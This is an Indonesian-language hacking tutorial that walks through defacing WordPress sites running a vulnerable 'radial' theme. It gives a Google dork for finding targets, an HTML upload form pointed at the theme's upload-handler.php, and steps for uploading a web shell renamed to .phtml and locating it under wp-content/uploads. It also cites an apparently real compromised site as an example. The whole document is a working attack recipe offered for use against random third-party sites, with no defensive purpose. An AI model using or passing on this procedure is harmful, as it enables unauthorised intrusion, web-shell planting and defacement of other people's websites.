Bahan :
1. Dork
inurl:/wp-content/themes/radial-themes
Kembanging biar dapet yg Vuln + Perawan :p
2. CSRF
<form enctype="multipart/form-data"action="site.co.li/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>
3. Exploit
/wp-content/themes/radial-theme/functions/upload-handler.php4. Shell atau Script Deface
Belum punya? Nih, Script Deface sederhana gw, COMOT.
Langkah - Langkah :
1. Dorking ke Google .
2. Pilih sala satu site.
3. Masukin exploit
/wp-content/themes/radial-theme/functions/upload-handler.phpContoh:
http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php
4. Kalo vuln bakal ada tulisan 'error'
5. Masukin site ke CSRF.
Contoh:
<form enctype="multipart/form-data"action="http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php"
method="post">
Pilih file lu: <input name="orange_themes" type="file" /><br>
<input type="submit" value="SIKAT!" />
</form>
6. Upload file lu. Kalo mau upload shell, rename dulu jadi .phtml (contoh: shell.phtml)
7. Kalo sukses, akan keluar nama file lu.
8. File akses?
site.com/wp-content/uploads/tahun/bulan/namafileContoh:
http://www.jhttcars.be/wp-content/uploads/2017/01/berandal.txt
Kalo masih belom paham, liat video di bawah :)
EmoticonEmoticon